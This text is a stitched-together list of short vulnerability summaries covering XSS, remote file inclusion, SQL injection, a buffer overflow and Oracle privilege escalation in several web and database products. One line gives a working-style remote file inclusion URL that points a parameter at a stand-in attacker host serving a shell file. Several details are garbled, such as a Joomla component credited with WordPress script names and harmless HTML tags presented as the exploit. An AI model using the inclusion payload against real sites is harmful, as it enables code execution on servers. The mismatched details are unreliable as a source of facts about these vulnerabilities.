This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker t inject malicious code into a web page. This code can be used to steal user data, hijack user sessions, redirect users to malicious sites, or perform other malicious activities.
Go to the shoutbox and type <font color="red">red text</font> or <marquee>hi</marquee> or http://server/[path]/include/prodler.class.php?sPath=http://attacker.com/shell.txt??? to exploit the vulnerability.
Simple Machines Forum is prone to multiple security vulnerabilities, including a remote PHP code-execution vulnerability, multiple cross-site scripting vulnerabilities, multiple cross-site request-forgery vulnerabilities, an information-disclosure vulnerability, and multiple denial-of-service vulnerabilities. Attackers can exploit these issues to execute arbitrary script code within the context of the webserver, perform unauthorized actions on behalf of legitimate users, compromise the affected application, steal cookie-based authentication credentials, obtain information that could aid in further attacks or cause denial-of-service conditions. An attacker can use a browser to exploit these issues. To exploit the cross-site scripting and cross-site request-forgery vulnerabilities, the attacker must entice an unsuspecting victim into following a malicious URI.
A vulnerability exists in Joomla Component MojoBlog RC0.15, which allows a remote attacker to include arbitrary files from remote locations. This is due to the application not properly sanitizing user-supplied input to the 'mosConfig_absolute_path' parameter in the 'wp-comments-post.php' and 'wp-trackback.php' scripts. An attacker can exploit this vulnerability to include arbitrary files from remote locations, which can lead to the execution of arbitrary code on the vulnerable system.
A SQL injection vulnerability exists in the Joomla! Joaktree component. An attacker can send a specially crafted HTTP request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code in the 'treeId' parameter of the 'index.php' script.
Haihaisoft Universal Player is prone to an unspecified buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Successful exploits allow remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts will likely result in denial-of-service conditions.
This exploit uses the evil cursor technique to grant DBA permission to an unprivileged user. It creates an evil cursor and uses the SYS.LT.CREATEWORKSPACE and SYS.LT.REMOVEWORKSPACE functions to execute the malicious code.
This exploit allows an unprivileged user to gain DBA permission by exploiting the Oracle ctxsys.drvxtabc.create_tables vulnerability. The exploit creates a function called OWN which grants DBA permission to the target user when executed.
This exploit grants DBA permission to an unprivileged user by using the Evil cursor technique. It uses the DBMS_SQL.OPEN_CURSOR and DBMS_SQL.PARSE functions to create an evil cursor and then uses the ctxsys.drvxtabc.create_tables function to execute the malicious code.
This exploit grants DBA permission to an unprivileged user by using the Evil cursor technique. It creates an evil cursor and then uses the SYS.LT.CREATEWORKSPACE and SYS.LT.COMPRESSWORKSPACETREE functions to execute the malicious code.
Services By CQR